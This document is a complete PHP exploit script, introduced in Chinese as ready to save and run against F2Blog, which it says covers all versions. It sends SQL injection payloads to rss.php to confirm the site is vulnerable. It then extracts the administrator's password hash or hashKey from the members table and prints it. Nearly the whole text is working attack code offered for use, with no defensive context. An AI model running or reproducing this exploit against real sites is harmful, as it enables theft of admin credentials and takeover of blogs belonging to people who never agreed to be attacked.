将下面代码保存为.php文件即可使用.
<?php
print_r("
+------------------------------------------------------------------+
Exploit For F2Blog All Version
BY Mokfly 媒婆X 拖鞋王子
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$blogpath="$argv[2]";
$server="$argv[1]";
$cookie='';
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)";
$type=$argv[3];
$cmd="find=and 1=2 union select 0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C from f2blog_members where role=0x61646D696E/*";
echo "Testting...:\t";
$response=send($cmd,'rss.php?cateID=1');
if(strpos($response,'we love shell')) {
echo "Vul\r\n";
}
echo "Now Crack the admin\r\n\r\n";
if($type==0){
$cmd="find=and 1=2 union select hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey from f2blog_members where role=0x61646D696E/*";
$response=send($cmd,'rss.php?cateID=1');
preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches);
$matches=array_reverse($matches);
$matches=array_reverse($matches[0]);
if(is_hash($matches[0])) {
echo "hash:\t";
die(print_r($matches[0]));
}
die("Exploit Failed\r\n");
}
else{
$cmd="find=and 1=2 union select password,password,password,password,password,password,password,password,password from f2blog_members where role=0x61646D696E/*";
$response=send($cmd,'rss.php?cateID=1');
preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches);
$matches=array_reverse($matches);
$matches=array_reverse($matches[0]);
if(is_hash($matches[0])) {
echo "password:\t";
die(print_r($matches[0]));
}
die("Exploit Failed\r\n");
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
function send($cmd,$path)
{
global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$blogpath."$path";
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
// echo $message;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
?>